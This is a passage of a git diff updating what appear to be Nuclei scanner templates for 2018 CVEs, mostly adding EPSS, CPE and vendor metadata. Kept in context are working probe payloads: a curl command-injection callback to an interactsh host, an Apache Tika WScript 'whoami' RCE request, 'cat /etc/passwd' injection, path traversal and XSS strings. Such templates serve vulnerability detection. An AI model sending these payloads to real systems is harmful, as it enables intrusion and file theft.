&act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' stop-at-first-match: true + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" diff --git a/http/cves/2018/CVE-2018-10822.yaml b/http/cves/2018/CVE-2018-10822.yaml index 5a3f6975c5..4027b5e6d1 100644 --- a/http/cves/2018/CVE-2018-10822.yaml +++ b/http/cves/2018/CVE-2018-10822.yaml @@ -15,9 +15,13 @@ info: cvss-score: 7.5 cve-id: CVE-2018-10822 cwe-id: CWE-22 - tags: dlink,edb,seclists,cve,cve2018,lfi,router + epss-score: 0.17386 + cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dlink + product: dwr-116_firmware + tags: dlink,edb,seclists,cve,cve2018,lfi,router http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml index 2baa18175b..a617e33af6 100644 --- a/http/cves/2018/CVE-2018-10823.yaml +++ b/http/cves/2018/CVE-2018-10823.yaml @@ -16,9 +16,13 @@ info: cvss-score: 8.8 cve-id: CVE-2018-10823 cwe-id: CWE-78 - tags: cve2018,rce,iot,dlink,router,edb,seclists,cve + epss-score: 0.96863 + cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dlink + product: dwr-116_firmware + tags: cve2018,rce,iot,dlink,router,edb,seclists,cve http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index 914c36795e..9edb1bcbbd 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -16,9 +16,13 @@ info: cvss-score: 7.5 cve-id: CVE-2018-10956 cwe-id: CWE-22 + epss-score: 0.68675 + cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Orchid Core VMS" + vendor: ipconfigure + product: orchid_core_vms tags: cve,cve2018,orchid,vms,lfi,edb http: diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml index 45cd14d7f4..c8c93e743f 100644 --- a/http/cves/2018/CVE-2018-11227.yaml +++ b/http/cves/2018/CVE-2018-11227.yaml @@ -10,15 +10,20 @@ info: - https://github.com/monstra-cms/monstra/issues/438 - https://www.exploit-db.com/exploits/44646 - https://nvd.nist.gov/vuln/detail/CVE-2018-11227 + - https://github.com/monstra-cms/monstra/issues classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-11227 cwe-id: CWE-79 + epss-score: 0.02667 + cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.favicon.hash:419828698 verified: true + vendor: monstra + product: monstra_cms tags: cve,cve2018,xss,mostra,mostracms,cms,edb http: @@ -37,8 +42,8 @@ http: words: - ">" - "Monstra" - condition: and case-insensitive: true + condition: and - type: word part: header diff --git a/http/cves/2018/CVE-2018-11231.yaml b/http/cves/2018/CVE-2018-11231.yaml index a2401ed241..41eb8a6e76 100644 --- a/http/cves/2018/CVE-2018-11231.yaml +++ b/http/cves/2018/CVE-2018-11231.yaml @@ -15,10 +15,14 @@ info: cvss-score: 8.1 cve-id: CVE-2018-11231 cwe-id: CWE-89 - tags: cve,cve2018,opencart,sqli + epss-score: 0.00903 + cpe: cpe:2.3:a:divido:divido:-:*:*:*:*:opencart:*:* metadata: max-request: 1 - + framework: opencart + vendor: divido + product: divido + tags: cve,cve2018,opencart,sqli,intrusive variables: num: "999999999" @@ -32,13 +36,13 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - - type: word part: body words: - - '{{md5({{num}})}}' + - "{{md5({{num}})}}" - type: status status: diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index d2076761f0..23a12a6565 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml @@ -10,25 +10,32 @@ info: - https://www.exploit-db.com/exploits/44865/ - http://web.archive.org/web/20211208114213/https://securitytracker.com/id/1041148 - https://nvd.nist.gov/vuln/detail/CVE-2018-11409 + - http://www.securitytracker.com/id/1041148 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2018-11409 cwe-id: CWE-200 - tags: edb,cve,cve2018,splunk + epss-score: 0.95561 + cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: splunk + product: splunk + tags: edb,cve,cve2018,splunk http: - method: GET path: - '{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json' - '{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json' + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word words: - licenseKeys + + - type: status + status: + - 200 diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index 2043ac7df7..3e263f23e5 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -15,10 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-11473 cwe-id: CWE-79 + epss-score: 0.00097 + cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.favicon.hash:419828698 verified: true + vendor: monstra + product: monstra tags: cve,cve2018,xss,mostra,mostracms,cms http: @@ -26,7 +30,6 @@ http: - | GET /users/registration HTTP/1.1 Host: {{Hostname}} - - | POST /users/registration HTTP/1.1 Host: {{Hostname}} @@ -35,6 +38,7 @@ http: csrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test®ister=Register cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -42,8 +46,8 @@ http: words: - ">" - "Monstra" - condition: and case-insensitive: true + condition: and - type: word part: header @@ -57,8 +61,8 @@ http: extractors: - type: regex name: csrf - part: body group: 1 regex: - 'id="csrf" name="csrf" value="(.*)">' internal: true + part: body diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index 79108b6df7..0706563a6d 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -9,14 +9,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-11709 - https://wordpress.org/plugins/wpforo/#developers - https://wpvulndb.com/vulnerabilities/9090 + - https://blog.dewhurstsecurity.com/2018/06/01/wp-foro-wordpress-plugin-xss-vulnerability.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-11709 cwe-id: CWE-79 - tags: cve,cve2018,wordpress,xss,wp-plugin + epss-score: 0.00151 + cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: gvectors + product: wpforo_forum + tags: cve,cve2018,wordpress,xss,wp-plugin http: - method: GET @@ -26,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml index dbdc480de9..f707d7dbda 100644 --- a/http/cves/2018/CVE-2018-11759.yaml +++ b/http/cves/2018/CVE-2018-11759.yaml @@ -9,17 +9,21 @@ info: reference: - https://github.com/immunIT/CVE-2018-11759 - https://lists.apache.org/thread.html/6d564bb0ab73d6b3efdd1d6b1c075d1a2c84ecd84a4159d6122529ad@%3Cannounce.tomcat.apache.org%3E - - http://web.archive.org/web/20210518152646/https://www.securityfocus.com/bid/105888 - https://lists.debian.org/debian-lts-announce/2018/12/msg00007.html - https://nvd.nist.gov/vuln/detail/CVE-2018-11759 + - https://access.redhat.com/errata/RHSA-2019:0366 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-11759 cwe-id: CWE-22 + epss-score: 0.97485 + cpe: cpe:2.3:a:apache:tomcat_jk_connector:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: title:"Apache Tomcat" + vendor: apache + product: tomcat_jk_connector tags: cve,cve2018,apache,tomcat,httpd,mod-jk http: diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index 9eee07e449..7e630fd38e 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -11,14 +11,19 @@ info: - https://cwiki.apache.org/confluence/display/WW/S2-057 - https://security.netapp.com/advisory/ntap-20180822-0001/ - https://nvd.nist.gov/vuln/detail/CVE-2018-11776 + - http://packetstormsecurity.com/files/172830/Apache-Struts-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2018-11776 cwe-id: CWE-20 - tags: cve,cve2018,apache,rce,struts,kev + epss-score: 0.97562 + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: struts + tags: packetstorm,cve,cve2018,apache,rce,struts,kev http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index 928d2943b8..ee42904d71 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml @@ -9,16 +9,22 @@ info: reference: - https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@%3Cannounce.tomcat.apache.org%3E - https://nvd.nist.gov/vuln/detail/CVE-2018-11784 - - http://web.archive.org/web/20210509082244/https://www.securityfocus.com/bid/105524 + - http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00030.html + - http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00056.html + - http://packetstormsecurity.com/files/163456/Apache-Tomcat-9.0.0M1-Open-Redirect.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N cvss-score: 4.3 cve-id: CVE-2018-11784 cwe-id: CWE-601 + epss-score: 0.9667 + cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"Apache Tomcat" - tags: tomcat,redirect,cve,cve2018,apache + vendor: apache + product: tomcat + tags: packetstorm,tomcat,redirect,cve,cve2018,apache http: - method: GET @@ -28,11 +34,11 @@ http: matchers-condition: and matchers: - type: regex + part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - part: header - type: status + negative: true status: - 404 - negative: true diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index 1b8a9c573a..b287150ce1 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -14,9 +14,13 @@ info: cvss-score: 9.8 cve-id: CVE-2018-12031 cwe-id: CWE-22 - tags: edb,cve,cve2018,lfi + epss-score: 0.01411 + cpe: cpe:2.3:a:eaton:intelligent_power_manager:1.6:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: eaton + product: intelligent_power_manager + tags: edb,cve,cve2018,lfi http: - method: GET @@ -27,11 +31,12 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or - part: body + - type: status status: - 200 diff --git a/http/cves/2018/CVE-2018-12054.yaml b/http/cves/2018/CVE-2018-12054.yaml index bd2d4d393c..17efc68af9 100644 --- a/http/cves/2018/CVE-2018-12054.yaml +++ b/http/cves/2018/CVE-2018-12054.yaml @@ -15,9 +15,13 @@ info: cvss-score: 7.5 cve-id: CVE-2018-12054 cwe-id: CWE-22 - tags: cve,cve2018,lfi,edb + epss-score: 0.55866 + cpe: cpe:2.3:a:schools_alert_management_script_project:schools_alert_management_script:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: schools_alert_management_script_project + product: schools_alert_management_script + tags: cve,cve2018,lfi,edb http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2018/CVE-2018-1207.yaml b/http/cves/2018/CVE-2018-1207.yaml index 06ad0854d8..5caa81ff85 100644 --- a/http/cves/2018/CVE-2018-1207.yaml +++ b/http/cves/2018/CVE-2018-1207.yaml @@ -13,21 +13,27 @@ info: - https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py - https://nvd.nist.gov/vuln/detail/CVE-2018-1207 - http://en.community.dell.com/techcenter/extras/m/white_papers/20485410 + - https://twitter.com/nicowaisman/status/977279766792466432 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-1207 cwe-id: CWE-94 - tags: cve,cve2018,dell,injection,rce + epss-score: 0.03417 + cpe: cpe:2.3:a:dell:emc_idrac7:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dell + product: emc_idrac7 + tags: cve,cve2018,dell,injection,rce http: - method: GET path: - "{{BaseURL}}/cgi-bin/login?LD_DEBUG=files" + matchers: - type: word + part: response words: - "calling init: /lib/" - part: response diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml index 3f4bf07cb4..b843f7ef82 100644 --- a/http/cves/2018/CVE-2018-12095.yaml +++ b/http/cves/2018/CVE-2018-12095.yaml @@ -15,9 +15,13 @@ info: cvss-score: 5.4 cve-id: CVE-2018-12095 cwe-id: CWE-79 - tags: cve,cve2018,xss,edb + epss-score: 0.00407 + cpe: cpe:2.3:a:oecms_project:oecms:3.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: oecms_project + product: oecms + tags: cve,cve2018,xss,edb http: - method: GET @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index 1ead21f04f..1b513a24fa 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -13,9 +13,13 @@ info: cvss-score: 7.5 cve-id: CVE-2018-12296 cwe-id: CWE-732 - tags: cve,cve2018,seagate,nasos,disclosure,unauth + epss-score: 0.01284 + cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: seagate + product: nas_os + tags: cve,cve2018,seagate,nasos,disclosure,unauth http: - raw: @@ -34,7 +38,7 @@ http: extractors: - type: regex - part: body group: 1 regex: - '"version": "([0-9.]+)"' + part: body diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index cf425691b2..124fa33703 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -13,13 +13,16 @@ info: cvss-score: 6.1 cve-id: CVE-2018-12300 cwe-id: CWE-601 - tags: cve,cve2018,redirect,seagate,nasos + epss-score: 0.00118 + cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: seagate + product: nas_os + tags: cve,cve2018,redirect,seagate,nasos http: - method: GET - path: - '{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#' diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml index 8fc912dc37..a9ea137c63 100644 --- a/http/cves/2018/CVE-2018-12613.yaml +++ b/http/cves/2018/CVE-2018-12613.yaml @@ -9,18 +9,20 @@ info: - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 - https://www.phpmyadmin.net/security/PMASA-2018-4/ - https://www.exploit-db.com/exploits/44928/ - - http://web.archive.org/web/20210124181726/https://www.securityfocus.com/bid/104532/ - https://nvd.nist.gov/vuln/detail/CVE-2018-12613 + - https://security.gentoo.org/glsa/201904-16 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2018-12613 cwe-id: CWE-287 + epss-score: 0.97501 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* - epss-score: 0.97516 - tags: vulhub,edb,cve,cve2018,phpmyadmin,lfi metadata: max-request: 1 + vendor: phpmyadmin + product: phpmyadmin + tags: vulhub,edb,cve,cve2018,phpmyadmin,lfi http: - method: GET @@ -29,11 +31,10 @@ http: matchers-condition: and matchers: - - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: diff --git a/http/cves/2018/CVE-2018-12634.yaml b/http/cves/2018/CVE-2018-12634.yaml index 23e85b7035..5515f21043 100644 --- a/http/cves/2018/CVE-2018-12634.yaml +++ b/http/cves/2018/CVE-2018-12634.yaml @@ -10,33 +10,39 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-12634 - https://www.seebug.org/vuldb/ssvid-97353 - https://www.exploit-db.com/exploits/45384/ + - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-12634 cwe-id: CWE-200 + epss-score: 0.96198 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* - epss-score: 0.96925 - tags: cve,cve2018,scada,circontrol,circarlife,logs,edb metadata: max-request: 1 + vendor: circontrol + product: circarlife_scada + tags: cve,cve2018,scada,circontrol,circarlife,logs,edb http: - method: GET path: - "{{BaseURL}}/html/log" + matchers-condition: and matchers: - type: word part: header words: - "CirCarLife Scada" + - type: word words: - "user.debug" - "user.info" - "EVSE" condition: and + - type: status status: - 200 diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index 9c48d3e539..1cfa7afed7 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -16,9 +16,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-12675 cwe-id: CWE-601 + epss-score: 0.00118 + cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:* metadata: max-request: 1 verified: true + vendor: sv3c + product: h.264_poe_ip_camera_firmware tags: cve,cve2018,redirect,sv3c,camera,iot http: diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index 44cae814ed..9618696e9a 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml @@ -8,29 +8,34 @@ info: reference: - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d - https://pivotal.io/security/cve-2018-1271 - - http://web.archive.org/web/20210518132800/https://www.securityfocus.com/bid/103699 - https://access.redhat.com/errata/RHSA-2018:1320 - https://nvd.nist.gov/vuln/detail/CVE-2018-1271 + - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.9 cve-id: CVE-2018-1271 cwe-id: CWE-22 - epss-score: 0.01676 - tags: cve,cve2018,spring,lfi,traversal + epss-score: 0.00986 + cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: vmware + product: spring_framework + tags: cve,cve2018,spring,lfi,traversal http: - method: GET path: - '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' - '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' + matchers-condition: and matchers: - type: word words: - 'for 16-bit app support' + - type: status status: - 200 diff --git a/http/cves/2018/CVE-2018-1273.yaml b/http/cves/2018/CVE-2018-1273.yaml index 138e3dbd91..3080065af2 100644 --- a/http/cves/2018/CVE-2018-1273.yaml +++ b/http/cves/2018/CVE-2018-1273.yaml @@ -15,13 +15,18 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-1273 - https://pivotal.io/security/cve-2018-1273 - http://mail-archives.apache.org/mod_mbox/ignite-dev/201807.mbox/%3CCAK0qHnqzfzmCDFFi6c5Jok19zNkVCz5Xb4sU%3D0f2J_1i4p46zQ%40mail.gmail.com%3E + - https://www.oracle.com/security-alerts/cpujul2022.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-1273 - cwe-id: CWE-20 + cwe-id: CWE-20,CWE-94 + epss-score: 0.97498 + cpe: cpe:2.3:a:pivotal_software:spring_data_commons:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: pivotal_software + product: spring_data_commons tags: cve,cve2018,vmware,rce,spring,kev http: @@ -38,11 +43,10 @@ http: command: - "cat /etc/passwd" - "type C:\\/Windows\\/win.ini" - matchers: - type: regex part: body regex: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" - condition: or \ No newline at end of file + condition: or diff --git a/http/cves/2018/CVE-2018-12998.yaml b/http/cves/2018/CVE-2018-12998.yaml index 392ee807ae..5060ae2c55 100644 --- a/http/cves/2018/CVE-2018-12998.yaml +++ b/http/cves/2018/CVE-2018-12998.yaml @@ -14,10 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-12998 cwe-id: CWE-79 - epss-score: 0.97193 - tags: cve,cve2018,zoho,xss,manageengine,packetstorm + epss-score: 0.97111 + cpe: cpe:2.3:a:zohocorp:firewall_analyzer:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: zohocorp + product: firewall_analyzer + tags: cve,cve2018,zoho,xss,manageengine,packetstorm http: - method: GET @@ -26,17 +29,16 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - "" - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml index 7d036679aa..3dfaa27691 100644 --- a/http/cves/2018/CVE-2018-1335.yaml +++ b/http/cves/2018/CVE-2018-1335.yaml @@ -9,42 +9,47 @@ info: - https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/ - https://www.exploit-db.com/exploits/47208 - https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E - - http://web.archive.org/web/20210516175956/https://www.securityfocus.com/bid/104001 - https://nvd.nist.gov/vuln/detail/CVE-2018-1335 + - http://packetstormsecurity.com/files/153864/Apache-Tika-1.17-Header-Command-Injection.html remediation: Upgrade to Tika 1.18. classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2018-1335 - tags: edb,cve,cve2018,apache,tika,rce + epss-score: 0.97341 + cpe: cpe:2.3:a:apache:tika:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: tika + tags: packetstorm,edb,cve,cve2018,apache,tika,rce,intrusive http: - method: PUT path: - "{{BaseURL}}/meta" + + body: var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec("cmd /c whoami"); + headers: X-Tika-OCRTesseractPath: cscript X-Tika-OCRLanguage: //E:Jscript Expect: 100-continue Content-type: image/jp2 Connection: close - body: "var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");" matchers-condition: and matchers: - - type: word + part: header words: - "Content-Type: text/csv" - part: header - type: word - words: - - "org.apache.tika.parser.DefaultParser" - - "org.apache.tika.parser.gdal.GDALParse" part: body + words: + - org.apache.tika.parser.DefaultParser + - org.apache.tika.parser.gdal.GDALParse condition: and - type: status diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml index 2cbc98f0bc..2c04a2b4a0 100644 --- a/http/cves/2018/CVE-2018-13379.yaml +++ b/http/cves/2018/CVE-2018-13379.yaml @@ -14,12 +14,14 @@ info: cvss-score: 9.8 cve-id: CVE-2018-13379 cwe-id: CWE-22 + epss-score: 0.97492 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* - epss-score: 0.975 metadata: max-request: 1 verified: true shodan-query: http.html:"/remote/login" "xxxxxxxx" + vendor: fortinet + product: fortios tags: cve,cve2018,fortios,lfi,kev http: diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index edf167228a..b794df3558 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -16,9 +16,12 @@ info: cve-id: CVE-2018-13380 cwe-id: CWE-79 epss-score: 0.00122 - tags: cve,cve2018,fortios,xss,fortinet + cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: fortinet + product: fortios + tags: cve,cve2018,fortios,xss,fortinet http: - method: GET @@ -37,9 +40,9 @@ http: - type: word part: header + negative: true words: - "application/json" - negative: true - type: status status: diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index 4c272ccdcc..387d6a8bf6 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -15,11 +15,13 @@ info: cvss-score: 5.5 cve-id: CVE-2018-13980 cwe-id: CWE-22 + epss-score: 0.0018 cpe: cpe:2.3:a:zeta-producer:zeta_producer:*:*:*:*:*:*:*:* - epss-score: 0.00089 - tags: cve,cve2018,lfi,edb,packetstorm metadata: max-request: 1 + vendor: zeta-producer + product: zeta_producer + tags: cve,cve2018,lfi,edb,packetstorm http: - method: GET @@ -28,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index 208e93a322..763aef53de 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -15,9 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-14013 cwe-id: CWE-79 - tags: cve,cve2018,xss,zimbra + epss-score: 0.00533 + cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: synacor + product: zimbra_collaboration_suite + tags: cve,cve2018,xss,zimbra http: - method: GET @@ -27,15 +31,15 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2018/CVE-2018-14064.yaml b/http/cves/2018/CVE-2018-14064.yaml index e1c92c1376..79f4242e5c 100644 --- a/http/cves/2018/CVE-2018-14064.yaml +++ b/http/cves/2018/CVE-2018-14064.yaml @@ -14,9 +14,13 @@ info: cvss-score: 9.8 cve-id: CVE-2018-14064 cwe-id: CWE-22 - tags: edb,cve,cve2018,lfi,camera,iot + epss-score: 0.28372 + cpe: cpe:2.3:o:velotismart_project:velotismart_wifi_firmware:b-380:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: velotismart_project + product: velotismart_wifi_firmware + tags: edb,cve,cve2018,lfi,camera,iot http: - method: GET @@ -25,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index 7fc197fb5e..9c971abb46 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -16,9 +16,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-14474 cwe-id: CWE-601 - tags: cve2018,redirect,orangeforum,oss,seclists,cve + epss-score: 0.00068 + cpe: cpe:2.3:a:goodoldweb:orange_forum:1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: goodoldweb + product: orange_forum + tags: cve2018,redirect,orangeforum,oss,seclists,cve http: - method: GET diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index 4dfe408834..929c5828ad 100644 --- a/http/cves/2018/CVE-2018-14574.yaml +++ b/http/cves/2018/CVE-2018-14574.yaml @@ -10,7 +10,6 